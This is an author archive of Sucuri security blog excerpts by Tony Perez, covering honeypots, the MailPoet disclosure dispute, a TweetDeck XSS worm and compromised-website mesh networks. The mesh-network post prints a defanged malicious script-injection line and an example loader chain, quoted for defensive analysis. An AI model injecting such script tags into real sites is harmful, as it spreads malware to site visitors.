Tony Perez

You will often find me in the shadows of the business focusing on operational effectiveness and cost inefficiencies. Catch my other rants on tonyonsecurity.com and follow at perezbox or tonyonsecurity

My WordPress Website Was Hacked

Before you freak out, allow me to clarify. It was one of several honeypots we have running. The honeypots are spread across the most commonly employed hosting companies. From Virtual Private Servers (VPS) to shared environments, to managed environments. In most instances we pay and configure them like any other consumer would so that we aren’t given any special treatment.

Honey Pot Systems are decoy servers or systems set up to gather information regarding an attacker or intruder into your system… A Honey Pot system is set up to be easier prey for intruders than true production systems but with minor system modifications so that their activity can be logged or traced. The general thought is that once an intruder breaks into a system, they will come back for subsequent visits. During these subsequent visits, additional information can be gathered and additional attempts at file, security and system access on the Honey Pot can be monitored and saved. – SANS

Our goal is simple; we want to better understand the dynamic nature of website security and continue to analyze and interpret attackers’ intentions. Having live sites that we allow to get hacked also keeps us sharp in terms of how we respond to these intrusions and, if we’re being completely honest, helps us to better understand the emotions that a website owner, like yourself, might go through. Between you and I though, it really gets us excited.. almost as excited as a spider when they feel their web vibrating as their prey struggles to free itself.. but I digress..

Sucuri - My Website was Hacked - Defacement

Sucuri – My Website was Hacked – Defacement



Read More

Backups – The Forgotten Website Security Pillar

I travel a lot (a lot might actually be an understatement these days), but the travel always revolves around a couple common threads – namely website security education and awareness. In these travels, regardless of whether I’m speaking with a WordPress, Joomla, Drupal or another community, there are always common questions like, “How important is it to proactively protect my environment,” or, “How can I fix my environment after it’s been hacked?” Of course, those are really important questions, and as the CEO of a company that meets those needs, I’m more than happy to answer those big questions. But as I’ve traveled the country and answered those questions, I’ve noticed a fundamental lack of understanding of a more basic security need: backups, specifically how backups fit into the security spectrum.

Sucuri - Security Pillars

It’s very easy to get bogged down in the minutiae that makes up your website’s security, but as with everything, having a great foundation will provide the security required when everything else fails.


Read More

Responsible Disclosure – Sucuri Open Letter to MailPoet and Future Disclosures

Many don’t know who I am. My name is Tony Perez, I’m the CEO of Sucuri. I have the pleasure of calling this company my family and everyday I work for every person at this company. My partner is Daniel Cid. He is one of the foremost thought leaders in the website security domain, his influence extending far beyond the communities that make up some of the most popular CMS applications today.

Together we are building one of the fastest growing Website Security companies in the domain, we have one simple mission, to create a safer web. We are a technology company built by technologists with a special, quirky, idea that we can make a difference.

Many don’t realize that the bedrock of our business is Research, all facets of research. It’s how we stay ahead of the bad guys, or attackers. It’s a responsibility we have, not just to the general public, but one that we owe to our clients – in basic terms, it’s what they pay us for. It’s how we ensure our tools and technologies stay ahead of the rest and what makes us the ideal solution for every website owner, our commitment to the Website Security domain.

This has come to head recently from the huge debacle over the past few weeks in which we reported a very serious vulnerability in the WordPress MailPoet Plugin (WHYSIJA-NEWSLETTERS). In the coming days the attackers proceeded to identify, then begin to exploit the disclosed vulnerability.

Frankly put, the entire situation was very unfortunate.

Some Background on the Recent MailPoet Issue

Here is a more accurate timeline on the order of events:

  1. 2014, Jun 16: Notified MailPoet of the vulnerability, provided patching recommendations.
  2. 2014, Jun 16: MailPoet team replied and said they were working on a fix.
  3. 2014, Jun 18: Notified Sucuri that they had fixed the bug and would released a patch soon.
  4. 2014, Jul 01: The MailPoet team updated WP.org with the new release.
  5. 2014, Jul 07: MetaSploit Module released for the Vulnerability

The total order of events from took 15 days.

Upon release of the blog post the MailPoet team did contact us to express their discontent with our actions, and this was our response in the interest of transparency:

As far as disclosing the vulnerability, this is quite a common practice and the correct way to bring awareness to a security issue. A good example of a perfect security disclosure was done by the Automattic team with JetPack:

http://jetpack.me/2014/04/10/jetpack-security-update/

As soon as they released a patch, they notified all users and contacted multiple blogs to ask them to urge everyone to upgrade.

I imagine you are worried about brand impact, but every piece of software will have bugs and security issues at some point. It rarely has any brand impact and if you respond properly, it can have the opposite effect and be very good for you plugin and team reputation. The “We had an issue, we fixed and it won’t happen again” type of message that your users would prefer to hear from you than from some external blog.

As for us, we don’t do that for publicity. It is just part of our research and work that we do every day. Even before Sucuri started, we were auditing code and disclosing security issues. Our goal is to be ahead of the bad guys to protect our clients and help the web at a whole.

I leave it for you all, unedited.

Open Letter to MailPoet

As to be expected, the MailPoet team is pretty pissed off as it would be expected. So pissed in fact that they felt compelled to question our intent and whether we shared the same goals, so let’s talk about that for a minute.

Are we sure we are all aiming for an open, safe web in the WordPress community?

In an effort to provide some peace of mind and transparency in our thought process, please read this open letter to MailPoet:

Hi Mailpoet Team

First and foremost, I am sorry for the troubles you have been experiencing as of late.

Second, I did want to take a minute to clarify a few points to avoid speculation:

1 – Let’s start with reasonable time:

MailPoet Post: It’s common practice among software security circles to disclose bugs privately with software companies, then get a reward, credit and the possibility to write about it, given a reasonable amount of time to fix it.

You see, it’s all about a reasonable amount of time.

Responsible disclosure is about time to patch. That is what we provided. We disclosed only after your organization patched and made it publicly available.

Responsible disclosure has nothing to do with providing reasonable time after the patch to wait before disclosing publicly. Especially when you look at how the issue was highlighted, or lack there of in the change log.

Sucuri - MailPoet Security Disclosure

Nothing highlighted the seriousness of the issue, so we did. That’s what we feel is our responsibility. It’s buried and lacks any emphasis, it’s why so many in the security business subscribed to Full Disclosure (i.e., https://www.schneier.com/blog/archives/2007/01/debating_full_d.html)

This was a very serious vulnerability, one that deserved attention and we did so after it was patched, as is expected and is the norm.

2 – In regards to this:

MailPoet Post: effectively giving no time to users to upgrade their MailPoet version

It’s arguable that the only reason many updated their plugins when the patch was released was because of our public release and our ability to reach 100′s of thousands of WordPress Website owners. We were also able to make contact with hosts, managed host, and development shops.

3 – In regards to this:

MailPoet Post: before posting a detailed technical disclosure

We did not post a detailed technical post. We did not share a Proof of Concept which is actually very standard, we did reference elements that we felt had a greater impact than the ecosystem in which your plugin currently operates. Here is a snippet of the technical description you are alluding too:

Sucuri Post: Because of the nature of the vulnerability, specifically it’s severity, we will not be disclosing additional technical details. The basics of the vulnerability however is something all plugin developers should be mindful of: the vulnerability resides in the fact that the developers assumed that WordPress’s “admin_init” hooks were only called when an administrator user visited a page inside /wp-admin/.

As you know, we also did not disclose any Proof of Concepts. We directed all those requests to your team to handle at your discretion.

4 – I presume this is meant to be a direct attack at us:

MailPoet Post: Are we sure we are all aiming for an open, safe web in the WordPress community?

If I misinterpreted the intent here, please do let me know. You are right though, our ambitions are much larger than the WordPress community, we’re pursuing a safer web we as a whole regardless of platform.

Again, I personally apologize and empathize with the struggles you have endured over the past week or so. Your struggles were not our intent, and not our driving force. Before this incident we had no relationship and had no interest in the space you are in.

That being said, if it ever becomes an issue in the future, for you or any other developer, we will follow the same protocol that we used with MailPoet.

All the Best,

Tony and Daniel

One small note, you mentioned:


There’s a difference between warning users and disclosing a 0 day vulnerability to the entire world on the same day of the bugfix release.

Small point of clarification, Zero Day vulnerabilities are those that are released and have no patch. Your vulnerability was patched, hence not being a Zero Day anymore.

Creating a Safer Web

Yes, in case you’re wondering, this is but the tip of the iceberg for us.

We will be proactively researching security issues across the wide spectrum that is Website Security. From CMS applications like WordPress, Joomla, osCommerce, vBulletin, etc… to web servers like Apache, NGINX, Windows IIS, and more. As stated before, it’s what makes us who we are and the responsibility we have to our clients as well as the wider audience of the web as a whole.

The time to be more proactive in our research and overall contribution to the web is now, not tomorrow or the day after. We stand fast in our convictions and will continue to push forward. Remember our responsibility is not the developers and designers, but the millions of website owners, their websites and their businesses.

All the best,

Tony / Daniel

Serious Cross Site Scripting Vulnerability in TweetDeck – Twitter

This morning as I was logging into various social networks I was presented with a popup with “XSS on Tweet Deck.” This obviously set every hair on my neck on fire, it’s obviously not the normal welcome screen.

After some investigation, I found a tweet from one account that I follow that had the following javascript code. It would be all good, but TweetDeck wasn’t sanitizing the input which caused the code to execute on the browser.

Screen Shot 2014-06-11 at 9.41.54 AM

This is why, someone injected this into their tweet. When you logged into TweetDeck it triggered the vulnerability:

Screen Shot 2014-06-11 at 9.45.29 AM

As you can see, the XSS attack was set to automatically retweet via this: data-action:retweet causing a chain event for anyone that logs into TweetDeck.

This is a very serious security flaw. TweetDeck says they have already addressed the issue:

Screen Shot 2014-06-11 at 9.56.21 AM

To be safe though, we recommend logging out of Tweetdeck, Revoking Access in your Twitter profile and resetting all connections if you want to continue to use the application.

Screen Shot 2014-06-11 at 9.56.04 AM

What is very annoying about this is that you can’t undo the automatic retweet, making it very difficult to remove from people’s timeliness. Thankfully, the attack is mostly benign and appears to be intended to making a statement than causing harm, but it’s clear example of how the largest of applications can be exploited.

Understanding Denial of Service and Brute Force Attacks – WordPress, Joomla, Drupal, vBulletin

Many are likely getting emails with the following subject header Large Distributed Brute Force WordPress Attack Underway – 40,000 Attacks Per Minute. Just this week we put out a post titled More Than 162,000 WordPress Sites Used for Distributed Denial of Service Attack.

What’s the Big Deal?

Remember life before social media? How quiet and content we seemed to be? How the only place we got our information was from the local news or cable outlet? Maybe a phone call, or via email? Today however, we seem to be inundated with information, with raw unfiltered data, left to our thoughts and perceptions of what they really mean. Every day there is some new tragedy, a plane goes missing, a child is abducted, a school shooting, the brink of WWW III. Is it that we live in a time where we are all losing our mind? Or maybe, could it be that the only difference between now and then, is the insane amount of information at our finger tips?

With this in mind, yes, it’s true, there are ongoing Distributed Denial of Service (DDoS) and Brute Force attacks against WordPress sites. In fact it extends far beyond that specific platform, it’s affecting many other platforms like vBulletin, Joomla, Drupal. The reality is that these attacks have been ongoing for many months now, so much so, that they’ve become part of our daily life and it’s not when they happen that we’re surprised, quite the contrary, when they don’t.

Read More

New iFrame Injections Leverage PNG Image Metadata

We’re always trying to stay ahead of the latest trends, and today we caught a very interesting one that we have either been missing, or it’s new. We’ll just say it’s new.. ;)

We’re all familiar with the idea of iFrame Injections, right?

Understanding an iFrame Injection

The iFrame HTML tag is very standard today, it’s an easy way to embed content from another site into your own. It’s supported by almost all browsers and employed by millions of websites today, use Adsense? Then you have an iFrame embedded within your site too.

Pretty nifty, I know. Like with most things though, the good is always accompanied with the bad.

Read More

Website Mesh Networks Distributing Malware

Can you imagine having the keys to a kingdom? How awesome would that be!! This is true in all domains, especialy when it comes to your website. This is almost like the holy grail of website attacks, gain access and do what you want with someone else’s pride and joy.

We all know that once a website is compromised it can be used by attackers in various ways. The most common attack we see leverages the hacked site as part of a malicious SEO Spam campaign (most profitable), followed by malware distribution (think drive by downloads) and ofcourse the integration into botnets, to perform things like DDOS / brute force attacks on other sites.

In any of these scenarios the attacker is able to, more often than not, monetize “their” new website. Yes, the fact that they have gained access to your website makes it theirs now. On a side note, we are seeing a tremendous number of websites being used to mine bitcoins specifically, but being it’s the new Billion dollar currency it only makes sense, but I digress.

Back to the point…

None of this, ofcourse, is new to our industry. Just crawl through the archives of this blog and you’ll find scores of data points that talk to the various scenarios addressed above. What you won’t find though is this new trend that we’re seeing.

Since the shutdown of the Blackhole Exploit kit we’ve been sitting back idly waiting for the next big thing, and perhaps this is it, but then again, perhaps it’s nothing more something that hid in the shadow and is only now finally out in plain sight.

Let’s talk a little about website mesh networks and how they are being used to distribute malware.

What is a Mesh Network?

We won’t get into the details of what a Mesh Network is but we’ll provide you a little context so that you can better understand it as you read through this post:

A mesh network is a network topology in which each node (called a mesh node) relays data for the network. All nodes cooperate in the distribution of data in the network. – Wikipedia

Yes, I know, not the fanciest of descriptions but for our purpose it works. When reading through this, I want you think of each website as a node in the mesh.

Sucuri Mesh Network Illustration

In essence, each of the websites, although hosted separately, owned by people that don’t know each other, are all, inevitably interconnected to one another. Again, nothing new in the concept, we see it everyday in various botnets, right?

Mesh Network of Compromised Webites

The latest exploit kit payloads we are tracking on compromised websites seem to have a very similar characteristic, they are part of a bigger network of compromised website, or what we’re classifying as a compromised Website Mesh Network. As websites get infected, the attackers are continuously adding them to their larger network of malware intermediaries. This means it is not only being used against people visiting the website, but also against users of other compromised sites.

Think of a mesh network of script injections…

How a Mesh Network of JavaScript Injections Works

Let’s say the bad guy, Home Simpson managed to hack into 3 web sites: X.com, Y.com and Z.com. Homer injects malware into X.com that then loads from Y.com. The malware from Y.com is loaded from Z.com and the one from Z.com is loaded from X.com.

That’s right folks, you guessed it, it’s one Giant Self-Licking Ice Cream Cone!!!

Here is a better illustration of the flow:

x.com -> injected with code loading from y.com/hNtpSAXt.php?id=56162149
y.com -> injected with code loading from z.com/8zCUWiW7.php?id=55158211
z.com -> injected with code loading from x.com/zsaok9XZ.php?id=45566441

The Benefit of such a Network

The attacker no longer needs to register domains to hide malicious content and it is very hard to take down. The more sites he manages to compromise, the more powerful their mesh network of compromised websites becomes.

Mesh Network of the Javascript Injection RANDOM.php?id=RANDOM

To put this into perspective, just on the JavaScript injection they can look something like this:

<script src="httx://tiande-rivne-com-ua.1gb. ua/hNtpSAXt.php ?id=56162149&quit;
type="text/javascript"></script>

With this simple payload we were able to identify some 800 websites and more than 19,000 pages compromised. And the injection always happen with the same format, a script src loading from a random PHP file and a random ID code. Every compromised site gets this PHP code injected in it.

These are just some of the injections we were able to capture:

What is the Scale of these Website Mesh Networks?

While it is really hard to provide definitives around how many websites are really compromised and injected with this type of infection we are able to provide some good educated guesses.

Using our very limited view, we identified 800+ domains within our own network of clients. Google agrees with us and it seems they identified a lot more sites, who would have thought, based on the safe browsing data.

If you look at http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=fixreputation.net, they say:

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 101 domain(s), including dimensiones.org/, rometransfer.com/, hout-atelier.nl/.

If you check http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=magazyntuiteraz.pl, you will see:

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 60 domain(s), including moyer-consulting.com/, rote-liebe96.de/, izorynek.pl/.

So it seems that each site compromised is also used to infected 50+ different domains. And the more you dive into the data, the more sites you find.

For instance, look at this one http://www.google.com/safebrowsing/diagnostic?site=tiande-rivne-com-ua.1gb.ua you will see:

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 662 domain(s), including ovptrade.com/, stalkerzoneworld.ru/, fondazionegiannipellicani.it/

You can see that with a little sleuthing the order of magnitude begins to quickly multiply.

How are the sites being compromised

Ah yes, the age old question of how!!!

It’s not any easier to answer here as it’s ever been in any other post we share. As is often the case we see ascertain our data remotely and as such we are limited in a number ways, this case was no exception. We will however provide a post later better dissecting the payload, or at least we hope we will.

As for the how, we did try to scan several of the compromised website in attempt to identify the vector, but we had little luck. While we were unable to find a much coveted silver bullet that tied them together, there was more in what we didn’t find than one might think.

For instance, a few of them were using Drupal, others were using WordPress and ofcourse our Joomla friends were in on the action too. While this does not tell us the access vector, it does tell us it’s platform agnostic.

From this we can make a very educated assumption that the attackers are more than likely using a suite of tools to exploit these websites. From Brute Force attacks against the various platform admin panels to gain access control, to exploiting known or new vulnerabilities in any of the various applications. What is curious though is whether it’s all in one tool or kit and whether the payloads are being created independent of the platforms. Often, what we see is a payload specific to a platform which is later adapted or enhanced for other platforms. To find something like these attacks so tightly integrated and intertwined talks to an interesting trend.

Are you a webmaster? Do you own a web site? Please do your part securing your site so it is not added to these compromised Website Mesh Networks. There are various tools you can use to scan your websites and clean them up if they are infected, leverage them. Don’t get caught with your pants down!

Sucuri is Hiring – Employment Opportunities

It’s always an exciting time when we can reach out to our community and let folks know that there are new opportunities to join our company. That is where we find ourselves today.

We have reached a point where we need to reach out again and continue our growth trajectory. We are looking for a few good men and women in a variety of fields to join us.

Do you fit any of these?

If so, then let us know because we want to hear from you.


System Administrator (022517)

Technical Requirements:

  • Strong system administration and networking experience
  • Linux Knowledge – High
  • Nginx / Apache – High
  • OpenSSL – High
  • Shell Scripting – High
  • HIDS / IPS / IDS – High

Senior PHP Developer / Ops (022514)

Technical Requirements:

  • Senior developer who can write lean, secure PHP 5 code
  • Ability to adapt to various languages
  • Linux administration and management experience – Plus
  • Firm understanding of security principles and use of good security practices
  • Broad understanding of web architecture and scalable platforms

Senior Security Researcher (022515)

Technical Requirements:

  • Experience white-hat hacking and finding vulnerabilities in web applications / web stacks.
  • Experience with a variety of programming languages, frameworks (WordPress, Joomla, vBulletin, Wiki, etc..) and an understanding on how to exploit them.
  • Strong understand of PHP and SQL is a plus
  • Ability to write Proof of Concepts against vulnerabilities is a plus
  • Knowledge of research and white hat security tools
  • You can take a web site, find vulnerabilities, suggest fixes and build ways to prevent that from being exploited
  • Malware decoding experience is a plus

Senior Frontend Developer (022516)

Technical Requirements:

  • Strong HTML, Javascript and CSS experience
  • Ability to effectively convert designs to functional front-end code
  • Familiarity with CMS applications (i.e., WordPress, Joomla, etc..) is a plus
  • You have built other products before and know what it takes to create responsive and intuitive design

Please submit your resume

If any of these positions sound like something you think you’d be able to excel at then we want to hear from you. Send us an email with your resume to jobs@sucuri.net, and let us know why you’d be awesome to work with.

Back to Employment Opportunities

Stealing Credit Cards – A WordPress and vBulletin Hack

What better way to celebrate Thanksgiving than to share an interesting case that involves two of the most popular CMS applications out there – vBulletin and WordPress.

Here is a real case that we just worked on this week, involving an attacker dead set on stealing credit card information. Enjoy!

The Environment

The client runs a fairly successful e-commerce website. They run two main applications within their architecture – vBulletin and WordPress.

vBulletin is used for their support and collaboration forums, while WordPress for their main website and e-commerce. This appears to be a pretty standard configuration across most larger web application environments these days.

Everything is sitting on a LAMP (Linux / Apache / MySQL / PHP) stack, so nothing too special there. For the most part, things are up to date, they might be a version or two behind, but none of it earth shattering or something worth writing home about.

In regards to security, they are running CloudFlare.

All in all, it probably sounds a lot like your environment[s].

Read More

Case Study: Analyzing a WordPress Attack – Dissecting the webr00t cgi shell – Part I

November 1st started like any other day on the web. Billions of requests were being shot virtually between servers in safe and not so safe attempts to access information. After months of waiting, finally one of those not so safe request hit one of our honeypots.

We won’t get into the location of the site because it really doesn’t matter, a fact that most critics don’t realize. As is often the case, the honeypot site was quiet without much traffic and the weakness was access control.

We intentionally left the password to the site to one of the top 10 passwords, with continuous attempts it took about 3 months before it was accessed.

This time though we were ready and this is how it went..

Read More